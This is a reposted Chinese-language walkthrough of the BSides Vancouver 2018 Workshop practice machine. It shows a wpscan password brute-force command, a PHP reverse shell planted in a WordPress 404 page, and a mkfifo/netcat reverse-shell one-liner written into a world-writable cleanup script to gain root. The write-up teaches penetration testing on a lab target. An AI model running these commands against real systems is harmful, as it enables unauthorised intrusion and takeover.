BSides-Vancouver-2018-Workshop靶机教学

admin 2025年3月23日22:54:42评论9 views字数 878阅读2分55秒阅读模式

BSides-Vancouver-2018-Workshop靶机教学——以上内容由**音乐热评筛选

arp发现靶机ip地址BSides-Vancouver-2018-Workshop靶机教学nmap扫描端口BSides-Vancouver-2018-Workshop靶机教学访问一下80端口BSides-Vancouver-2018-Workshop靶机教学dirb跑一下目录BSides-Vancouver-2018-Workshop靶机教学看下robots页面BSides-Vancouver-2018-Workshop靶机教学来到了新的页面有点熟悉BSides-Vancouver-2018-Workshop靶机教学这时候想起ftp可以匿名登录,看到这个users get下来看看BSides-Vancouver-2018-Workshop靶机教学cat一下应该是用户BSides-Vancouver-2018-Workshop靶机教学那有了用户名,有wordpress站点,是不是就可以爆破一下了,先把wp-admin的目录跑出来BSides-Vancouver-2018-Workshop靶机教学wpscan扫一下,果然发现john用户还有他的密码

wpscan --url http://192.168.52.137/backup_wordpress -e u -P /usr/share/wordlists/metasploit/burnett_top_1024.txt

BSides-Vancouver-2018-Workshop靶机教学BSides-Vancouver-2018-Workshop靶机教学又来到这个熟悉的页面,找到404页面插入反弹shell脚本,然后访问不存在的页面出发脚本会把BSides-Vancouver-2018-Workshop靶机教学将这个php-reverse-shell.php改这两BSides-Vancouver-2018-Workshop靶机教学BSides-Vancouver-2018-Workshop靶机教学粘贴到404这块BSides-Vancouver-2018-Workshop靶机教学我们在kali上开启监听,然后回到首页,随便访问一个不存在的页面触发脚本BSides-Vancouver-2018-Workshop靶机教学先拿一个交互式终端然后进行一波信息收集,这版本没有内核提权searchsploit没找到BSides-Vancouver-2018-Workshop靶机教学没有内核的话,那就只能去翻wp-config了看看有没有数据库密码,果然在www目录下找到wp-configBSides-Vancouver-2018-Workshop靶机教学直接进来BSides-Vancouver-2018-Workshop靶机教学直接进行一波信息收集BSides-Vancouver-2018-Workshop靶机教学识别一下是个md5BSides-Vancouver-2018-Workshop靶机教学解不出来,那只能换个思路了BSides-Vancouver-2018-Workshop靶机教学找一下系统里面有没有777的权限,发现一个cleanupBSides-Vancouver-2018-Workshop靶机教学那就是说往里面写一个反弹的语句就ok了,用这个小插件生成一个反弹shell的指令BSides-Vancouver-2018-Workshop靶机教学写进去了,连上了但是好像又没连BSides-Vancouver-2018-Workshop靶机教学那选一个这个rm的吧,原来clean up里面瞄了一眼也是rm什么咕噜咕噜的

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.52.134 6666 >/tmp/f

BSides-Vancouver-2018-Workshop靶机教学写进去./执行即可,这里有点小问题好像给靶机打坏了,正常到这./执行就ok咯,或者等一分钟,等系统自动运行,建议等一分钟,./执行可能不是root权限!!BSides-Vancouver-2018-Workshop靶机教学这里云一下结果吧BSides-Vancouver-2018-Workshop靶机教学

原文始发于微信公众号(泷羽Sec-云起):BSides-Vancouver-2018-Workshop靶机教学

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月23日22:54:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   BSides-Vancouver-2018-Workshop靶机教学https://cn-sec.com/archives/3875467.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息